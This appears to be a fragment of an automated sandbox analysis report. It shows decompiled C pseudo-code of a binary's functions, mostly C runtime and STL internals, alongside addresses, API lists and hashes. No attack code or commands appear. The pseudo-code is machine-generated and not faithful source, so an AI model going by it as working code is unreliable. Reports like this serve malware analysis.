				 *((intOrPtr*)(_t55 + 0x24)) = _t7;
				_t9 = _t55 + 8; // 0x4a99ac
				 *((intOrPtr*)(_t55 + 0x10)) = _t9;
				_t11 = _t55 + 0x28; // 0x4a99cc
				 *((intOrPtr*)(_t55 + 0x30)) = _t11;
				_t13 = _t55 + 0xc; // 0x4a99b0
				_t29 = _t13;
				 *((intOrPtr*)(_t55 + 0x14)) = _t29;
				_t15 = _t55 + 0x2c; // 0x4a99d0
				 *((intOrPtr*)(_t55 + 0x34)) = _t15;
				 *_t29 = 0;
				_t18 = _t55 + 0x24; // 0x401d7f
				 *((intOrPtr*)( *_t18)) = 0;
				_t19 = _t55 + 0x34; // 0x4022f0
				 *((intOrPtr*)( *_t19)) = 0;
				_t20 = _t55 + 0x10; // 0x402619
				 *((intOrPtr*)( *_t20)) = 0;
				_t21 = _t55 + 0x20; // 0x40228c
				 *((intOrPtr*)( *_t21)) = 0;
				_t22 = _t55 + 0x30; // 0x401e43
				 *((intOrPtr*)( *_t22)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t57 - 0xc));
				return _t55;
			}














                                                                                      0x004028df
                                                                                      0x004028e4
                                                                                      0x004028e6
                                                                                      0x004028e9
                                                                                      0x004028ea
                                                                                      0x004028ed
                                                                                      0x004028f3
                                                                                      0x004028fa
                                                                                      0x004028fc
                                                                                      0x00402904
                                                                                      0x00402907
                                                                                      0x00402909
                                                                                      0x00402922
                                                                                      0x00402922
                                                                                      0x0040290b
                                                                                      0x00402910
                                                                                      0x00402919
                                                                                      0x0040291e
                                                                                      0x0040291e
                                                                                      0x00402924
                                                                                      0x00402927
                                                                                      0x0040292a
                                                                                      0x0040292d
                                                                                      0x00402930
                                                                                      0x00402933
                                                                                      0x00402936
                                                                                      0x00402939
                                                                                      0x0040293c
                                                                                      0x0040293f
                                                                                      0x0040293f
                                                                                      0x00402942
                                                                                      0x00402945
                                                                                      0x00402948
                                                                                      0x0040294e
                                                                                      0x00402950
                                                                                      0x00402953
                                                                                      0x00402955
                                                                                      0x00402958
                                                                                      0x0040295a
                                                                                      0x0040295d
                                                                                      0x0040295f
                                                                                      0x00402962
                                                                                      0x00402964
                                                                                      0x00402967
                                                                                      0x0040296e
                                                                                      0x00402976

                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 004028DF
                                                                                      • std::_Mutex::_Mutex.LIBCPMT ref: 004028F3
                                                                                        • Part of subcall function 004044A8: _malloc.LIBCMT ref: 004044C2
                                                                                      • std::locale::_Init.LIBCPMT ref: 0040290B
                                                                                        • Part of subcall function 004030B0: __EH_prolog3.LIBCMT ref: 004030B7
                                                                                        • Part of subcall function 004030B0: std::_Lockit::_Lockit.LIBCPMT ref: 004030CB
                                                                                        • Part of subcall function 004030B0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 004030F4
                                                                                        • Part of subcall function 004030B0: std::locale::_Setgloballocale.LIBCPMT ref: 00403104
                                                                                        • Part of subcall function 004030B0: std::locale::facet::_Incref.LIBCPMT ref: 00403127
                                                                                      • std::locale::facet::_Incref.LIBCPMT ref: 00402919
                                                                                        • Part of subcall function 004011D6: std::_Lockit::_Lockit.LIBCPMT ref: 004011E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: std::_std::locale::_$IncrefLockitLockit::_std::locale::facet::_$H_prologH_prolog3InitLocimpLocimp::_MutexMutex::_Setgloballocale_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 2350284691-0
                                                                                      • Opcode ID: d973227bcccd0faa3c29e70a0a63d830a0d9d71b8b478eb4f9a75d3ce48151f8
                                                                                      • Instruction ID: ec8f6c415541bc0e296b0a456e6f2814170bb18dfd991079c9efbb856b131679
                                                                                      • Opcode Fuzzy Hash: d973227bcccd0faa3c29e70a0a63d830a0d9d71b8b478eb4f9a75d3ce48151f8
                                                                                      • Instruction Fuzzy Hash: B221C2B5600B008FC326DF6AC180996FBF8FF697107004A2FE99697B90E774B908CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00412EB5, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00412EB5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E004127A6(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412896(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00412DBB(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00412D00(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                      0x00412eba
                                                                                      0x00412ec0
                                                                                      0x00412f33
                                                                                      0x00000000
                                                                                      0x00412ec7
                                                                                      0x00412ec7
                                                                                      0x00412eca
                                                                                      0x00412ee5
                                                                                      0x00412ee8
                                                                                      0x00412f08
                                                                                      0x00412f1a
                                                                                      0x00412eea
                                                                                      0x00412eea
                                                                                      0x00412eed
                                                                                      0x00000000
                                                                                      0x00412eef
                                                                                      0x00412f01
                                                                                      0x00412f01
                                                                                      0x00412eed
                                                                                      0x00412f38
                                                                                      0x00412f3c
                                                                                      0x00412ecc
                                                                                      0x00412ee4
                                                                                      0x00412ee4
                                                                                      0x00412eca

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                      • String ID:
                                                                                      • API String ID: 3016257755-0
                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                      • Instruction ID: a2730941904a6584cf00af9cbe43493491fc7167fb6b6f2d9ebcb61f9e4e88fc
                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                      • Instruction Fuzzy Hash: B9118C3604014ABBCF125E84DE01CEE3F72BB19354F198416FE1898131D27AC9B2FB89
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401C55, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 72%
                                                                                      			E00401C55(void* __ebx, void* __edx, void* __edi, void* __fp0) {
				char _v60;
				char _v140;
				void* __esi;
				void* __ebp;
				intOrPtr _t5;
				void* _t21;
				void* _t26;

				_t22 = __edi;
				_t21 = __edx;
				_t17 = __ebx;
				_t5 =  *0x4af38c; // 0xfffde25d
				 *0x4b8384 = _t5;
				if(_t5 == 0xc) {
					GetQueuedCompletionStatus(0, 0, 0, 0, 0);
					_push(0);
					E0040417A(__ebx, _t21, __edi, 0, 0);
					_push(0);
					_push(0);
					_push(0);
					E00404272(__ebx, _t21, __edi, 0, 0);
					E00404429(0);
					st0 = __fp0;
					_push( &_v140);
					E00401F06();
					E00401FAF( &_v60, __edi);
					_v60 = 0x4a9950;
					E00402E05(_t22,  &_v60);
				}
				 *0x4b8384 =  *0x4b8384 + 0xb2d3b;
				E00401AD1(_t17, _t21, _t26);
				return 0;
			}










                                                                                      0x00401c55
                                                                                      0x00401c55
                                                                                      0x00401c55
                                                                                      0x00401c5b
                                                                                      0x00401c67
                                                                                      0x00401c6f
                                                                                      0x00401c78
                                                                                      0x00401c7e
                                                                                      0x00401c7f
                                                                                      0x00401c85
                                                                                      0x00401c86
                                                                                      0x00401c87
                                                                                      0x00401c88
                                                                                      0x00401c91
                                                                                      0x00401c96
                                                                                      0x00401c9f
                                                                                      0x00401ca0
                                                                                      0x00401ca9
                                                                                      0x00401cb3
                                                                                      0x00401cbb
                                                                                      0x00401cc0
                                                                                      0x00401cc1
                                                                                      0x00401ccb
                                                                                      0x00401cd6

                                                                                      APIs
                                                                                      • GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00401C78
                                                                                      • _ftell.LIBCMT ref: 00401C7F
                                                                                      • _fseek.LIBCMT ref: 00401C88
                                                                                        • Part of subcall function 00404429: __atof_l.LIBCMT ref: 00404433
                                                                                        • Part of subcall function 00401F06: __EH_prolog.LIBCMT ref: 00401F0B
                                                                                        • Part of subcall function 00401FAF: __EH_prolog.LIBCMT ref: 00401FB4
                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00401CBB
                                                                                        • Part of subcall function 00402E05: std::ios_base::_Tidy.LIBCPMT ref: 00402E2A
                                                                                        • Part of subcall function 00402E05: ctype.LIBCPMT ref: 00402E39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: H_prologstd::ios_base::_$CompletionIos_base_dtorQueuedStatusTidy__atof_l_fseek_ftellctype
                                                                                      • String ID:
                                                                                      • API String ID: 2470585456-0
                                                                                      • Opcode ID: c404d38d466b7c60573621991a887d9f5085339926a64ff574b134dcc87602cf
                                                                                      • Instruction ID: 883ced5b71cb0e625afc84b017ce21bc067161038f3f488878c8512fd02bb827
                                                                                      • Opcode Fuzzy Hash: c404d38d466b7c60573621991a887d9f5085339926a64ff574b134dcc87602cf
                                                                                      • Instruction Fuzzy Hash: 20F081B14051145BC360FBA6AC4AC8F7BDC9E46364F40063FF55492191EB7C9514D7EE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004055F3, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E004055F3(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4ab5b0);
				E004080B0(__ebx, __edi, __esi);
				_t28 = E00408C61(__ebx, __edx, __edi, _t30);
				_t13 =  *0x4adc98; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E004075B9(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x4add80; // 0x4adca8
					 *((intOrPtr*)(_t29 - 0x1c)) = E004055B5(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E0040565D();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00408C61(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E004083EA(_t25, _t26, 0x20);
				}
				return E004080F5(_t28);
			}







                                                                                      0x004055f3
                                                                                      0x004055f3
                                                                                      0x004055f3
                                                                                      0x004055f3
                                                                                      0x004055f3
                                                                                      0x004055f5
                                                                                      0x004055fa
                                                                                      0x00405604
                                                                                      0x00405606
                                                                                      0x0040560e
                                                                                      0x00405632
                                                                                      0x00405634
                                                                                      0x0040563a
                                                                                      0x0040563e
                                                                                      0x00405641
                                                                                      0x0040564c
                                                                                      0x0040564f
                                                                                      0x00405656
                                                                                      0x00405610
                                                                                      0x00405610
                                                                                      0x00405614
                                                                                      0x00000000
                                                                                      0x00405616
                                                                                      0x0040561b
                                                                                      0x0040561b
                                                                                      0x00405614
                                                                                      0x00405620
                                                                                      0x00405624
                                                                                      0x00405629
                                                                                      0x00405631

                                                                                      APIs
                                                                                      • __getptd.LIBCMT ref: 004055FF
                                                                                        • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
                                                                                        • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
                                                                                      • __getptd.LIBCMT ref: 00405616
                                                                                      • __amsg_exit.LIBCMT ref: 00405624
                                                                                      • __lock.LIBCMT ref: 00405634
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                      • String ID:
                                                                                      • API String ID: 3521780317-0
                                                                                      • Opcode ID: ebf836fdf6256b87ecdebd66eb5e83269563747bb106a499378bba13cdba9c3b
                                                                                      • Instruction ID: b3972ed9e45a2de8ebcbf974438e3a8231b760fa2e1e5ff5c63e9030658df030
                                                                                      • Opcode Fuzzy Hash: ebf836fdf6256b87ecdebd66eb5e83269563747bb106a499378bba13cdba9c3b
                                                                                      • Instruction Fuzzy Hash: F7F06D31941A10DBD720BB65880675A73A0EB00729F58853FE885B76C2DF7C99019F5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040BD3F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 89%
                                                                                      			E0040BD3F(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00405194(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00408C61(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00408C61(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E0040516D(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E0040BAD7(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                                                                                      0x0040bd3f
                                                                                      0x0040bd3f
                                                                                      0x0040bd3f
                                                                                      0x0040bd3f
                                                                                      0x0040bd3f
                                                                                      0x0040bd42
                                                                                      0x0040bd48
                                                                                      0x0040bd56
                                                                                      0x0040bd5c
                                                                                      0x0040bd64
                                                                                      0x0040bd70
                                                                                      0x0040bd78
                                                                                      0x0040bd80
                                                                                      0x0040bd94
                                                                                      0x0040bd96
                                                                                      0x0040bd9a
                                                                                      0x0040bd9f
                                                                                      0x0040bda5
                                                                                      0x0040bda7
                                                                                      0x0040bda9
                                                                                      0x0040bdac
                                                                                      0x00000000
                                                                                      0x0040bdb3
                                                                                      0x0040bda7
                                                                                      0x0040bd9a
                                                                                      0x0040bd94
                                                                                      0x0040bd80
                                                                                      0x0040bdb4

                                                                                      APIs
                                                                                        • Part of subcall function 00405194: __getptd.LIBCMT ref: 0040519A
                                                                                        • Part of subcall function 00405194: __getptd.LIBCMT ref: 004051AA
                                                                                      • __getptd.LIBCMT ref: 0040BD4E
                                                                                        • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
                                                                                        • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
                                                                                      • __getptd.LIBCMT ref: 0040BD5C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                      • String ID: csm
                                                                                      • API String ID: 803148776-1018135373
                                                                                      • Opcode ID: 9a2ddc81ac4e063272d1699841b814f5de1f68bb8839ed38d5eec017d608f2da
                                                                                      • Instruction ID: 4cf3631a83ca47e317304b360ca9ca5d8c37365c55d1a14800d683c47fa9ba4b
                                                                                      • Opcode Fuzzy Hash: 9a2ddc81ac4e063272d1699841b814f5de1f68bb8839ed38d5eec017d608f2da
                                                                                      • Instruction Fuzzy Hash: D6011234801204CACF28DE25D444AAEB3B5EF10315F28443FE481AA7D2CB388990DF9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402B71, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 87%
                                                                                      			E00402B71(void* __ebx, void* __edi, signed int _a4) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v40;
				void* __ebp;
				signed int _t35;
				signed int _t36;
				intOrPtr _t47;
				void* _t50;
				void* _t56;
				signed int _t60;
				signed int _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t78;
				intOrPtr* _t81;
				signed int _t85;
				signed int _t86;
				void* _t88;

				_t80 = __edi;
				_t61 = __ebx;
				_t64 = _a4;
				if(_t64 > 0) {
					_t36 = _t35 | 0xffffffff;
					_t78 = _t36 % _t64;
					__eflags = _t36 / _t64 - 1;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = _a4 & 0x00000000;
						_t66 =  &_v16;
						E004039A8(_t66, _t78,  &_a4);
						_v16 = 0x4a7244;
						E004052D2( &_v16, 0x4abc00);
						asm("int3");
						E004A6CC8(E004A6EFE, _t88);
						_push(__ebx);
						_push(__edi);
						_t81 = _t66;
						E00403200( &_v28, 0);
						_v8 = 0;
						_v20 =  *0x4b838c;
						__eflags =  *0x4af658; // 0x0
						if(__eflags == 0) {
							E00403200( &_v24, 0);
							__eflags =  *0x4af658; // 0x0
							if(__eflags == 0) {
								 *0x4af64c =  *0x4af64c + 1;
								__eflags =  *0x4af64c;
								_t60 =  *0x4af64c; // 0x0
								 *0x4af658 = _t60;
							}
							E00403228( &_v24);
						}
						_t85 =  *0x4af658; // 0x0
						_t47 =  *_t81;
						__eflags = _t85 -  *((intOrPtr*)(_t47 + 0xc));
						if(_t85 >=  *((intOrPtr*)(_t47 + 0xc))) {
							_t68 = 0;
							__eflags = 0;
						} else {
							_t68 =  *( *((intOrPtr*)(_t47 + 8)) + _t85 * 4);
						}
						__eflags = _t68;
						if(_t68 != 0) {
							L17:
							_t86 = _t68;
						} else {
							__eflags =  *(_t47 + 0x14);
							if( *(_t47 + 0x14) == 0) {
								goto L17;
							} else {
								_t56 = E00402EDE();
								__eflags = _t85 -  *((intOrPtr*)(_t56 + 0xc));
								if(_t85 >=  *((intOrPtr*)(_t56 + 0xc))) {
									_t86 = 0;
								} else {
									_t86 =  *( *((intOrPtr*)(_t56 + 8)) + _t85 * 4);
								}
							}
						}
						__eflags = _t86;
						if(_t86 == 0) {
							_t86 = _v20;
							__eflags = _t86;
							if(_t86 == 0) {
								_push(_t81);
								_t50 = E004012EB(0, _t78,  &_v20);
								__eflags = _t50 - 0xffffffff;
								if(_t50 == 0xffffffff) {
									E00403A98( &_v40, "bad cast");
									E004052D2( &_v40, 0x4abbc8);
								}
								_t86 = _v20;
								 *0x4b838c = _t86;
								E004011D6(_t86);
								E00402FA3(_t78, _t86);
							}
						}
						_t31 =  &_v8;
						 *_t31 = _v8 | 0xffffffff;
						__eflags =  *_t31;
						E00403228( &_v28);
						 *[fs:0x0] = _v16;
						return _t86;
					}
				} else {
					_t64 = 0;
					L2:
					_push(_t64);
					return E004044A8(_t61, _t78, _t80, 0);
				}
			}
























                                                                                      0x00402b71
                                                                                      0x00402b71
                                                                                      0x00402b74
                                                                                      0x00402b7c
                                                                                      0x00402b8b
                                                                                      0x00402b90
                                                                                      0x00402b92
                                                                                      0x00402b95
                                                                                      0x00000000
                                                                                      0x00402b97
                                                                                      0x00402b97
                                                                                      0x00402b9f
                                                                                      0x00402ba2
                                                                                      0x00402bb0
                                                                                      0x00402bb7
                                                                                      0x00402bbc
                                                                                      0x00402bc2
                                                                                      0x00402bca
                                                                                      0x00402bcc
                                                                                      0x00402bcd
                                                                                      0x00402bd5
                                                                                      0x00402bda
                                                                                      0x00402be2
                                                                                      0x00402be5
                                                                                      0x00402beb
                                                                                      0x00402bf1
                                                                                      0x00402bf6
                                                                                      0x00402bfc
                                                                                      0x00402bfe
                                                                                      0x00402bfe
                                                                                      0x00402c04
                                                                                      0x00402c09
                                                                                      0x00402c09
                                                                                      0x00402c11
                                                                                      0x00402c11
                                                                                      0x00402c16
                                                                                      0x00402c1c
                                                                                      0x00402c1e
                                                                                      0x00402c21
                                                                                      0x00402c2b
                                                                                      0x00402c2b
                                                                                      0x00402c23
                                                                                      0x00402c26
                                                                                      0x00402c26
                                                                                      0x00402c2d
                                                                                      0x00402c2f
                                                                                      0x00402c4c
                                                                                      0x00402c4c
                                                                                      0x00402c31
                                                                                      0x00402c31
                                                                                      0x00402c34
                                                                                      0x00000000
                                                                                      0x00402c36
                                                                                      0x00402c36
                                                                                      0x00402c3b
                                                                                      0x00402c3e
                                                                                      0x00402c48
                                                                                      0x00402c40
                                                                                      0x00402c43
                                                                                      0x00402c43
                                                                                      0x00402c3e
                                                                                      0x00402c34
                                                                                      0x00402c4e
                                                                                      0x00402c50
                                                                                      0x00402c52
                                                                                      0x00402c55
                                                                                      0x00402c57
                                                                                      0x00402c59
                                                                                      0x00402c5d
                                                                                      0x00402c63
                                                                                      0x00402c66
                                                                                      0x00402c70
                                                                                      0x00402c7e
                                                                                      0x00402c7e
                                                                                      0x00402c83
                                                                                      0x00402c88
                                                                                      0x00402c8e
                                                                                      0x00402c94
                                                                                      0x00402c99
                                                                                      0x00402c57
                                                                                      0x00402c9a
                                                                                      0x00402c9a
                                                                                      0x00402c9a
                                                                                      0x00402ca1
                                                                                      0x00402cae
                                                                                      0x00402cb6
                                                                                      0x00402cb6
                                                                                      0x00402b7e
                                                                                      0x00402b7e
                                                                                      0x00402b80
                                                                                      0x00402b80
                                                                                      0x00402b88
                                                                                      0x00402b88

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 00402BA2
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00402BB7
                                                                                        • Part of subcall function 004044A8: _malloc.LIBCMT ref: 004044C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                      • String ID: DrJ
                                                                                      • API String ID: 4063778783-64114676
                                                                                      • Opcode ID: 0474d3def17b3794ca22744718f68299944a1628c5d6be4130e4e3e0dc958057
                                                                                      • Instruction ID: c626501efe9eec911c111672c842ea421abfa753cf83b5d7ce926d37bdd0efde
                                                                                      • Opcode Fuzzy Hash: 0474d3def17b3794ca22744718f68299944a1628c5d6be4130e4e3e0dc958057
                                                                                      • Instruction Fuzzy Hash: BCE0E5B191010C6AC708EE65C546ADE376C9B61325F10863FA816E10C1DFB8E608CAAC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402735, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 86%
                                                                                      			E00402735(void* __ebx, signed int __ecx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				void* __ebp;
				signed int _t23;
				signed int _t24;
				void* _t32;
				void* _t33;
				char* _t34;
				intOrPtr _t35;
				intOrPtr _t38;
				signed int _t40;
				char* _t42;
				intOrPtr _t44;
				signed int _t47;
				char* _t54;
				void* _t57;
				void* _t58;

				_t49 = __edi;
				_t40 = __ecx;
				_t39 = __ebx;
				if(__ecx > 0) {
					_t24 = _t23 | 0xffffffff;
					_t47 = _t24 % __ecx;
					__eflags = _t24 / __ecx - 2;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_v8 = _v8 & 0x00000000;
						_t42 =  &_v20;
						E004039A8(_t42, _t47,  &_v8);
						_v20 = 0x4a7244;
						E004052D2( &_v20, 0x4abc00);
						asm("int3");
						_t57 = _t58;
						_push(__edi);
						_t50 = _v16;
						_t54 = _t42;
						_t32 = E00402A73(_t42, _v16);
						__eflags = _t32;
						if(_t32 == 0) {
							_t33 = E0040287C(__ebx, _t54, _t57, _a4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								_t44 =  *((intOrPtr*)(_t54 + 0x18));
								__eflags = _t44 - 0x10;
								if(_t44 < 0x10) {
									_t35 = _t54 + 4;
								} else {
									_t35 =  *((intOrPtr*)(_t54 + 4));
								}
								E0040102D(_t35, _t44, _t50, _a4);
								E00402860(_t54, _a4);
							}
							_t34 = _t54;
						} else {
							__eflags =  *((intOrPtr*)(_t54 + 0x18)) - 0x10;
							if( *((intOrPtr*)(_t54 + 0x18)) < 0x10) {
								_t38 = _t54 + 4;
							} else {
								_t38 =  *((intOrPtr*)(_t54 + 4));
							}
							_t34 = E00402635(_t54, _t54, _t50 - _t38, _a4);
						}
						return _t34;
					}
				} else {
					_t40 = 0;
					L2:
					_push(_t40 + _t40);
					return E004044A8(_t39, _t47, _t49, 0);
				}
			}





















                                                                                      0x00402735
                                                                                      0x00402735
                                                                                      0x00402735
                                                                                      0x0040273d
                                                                                      0x0040274d
                                                                                      0x00402752
                                                                                      0x00402754
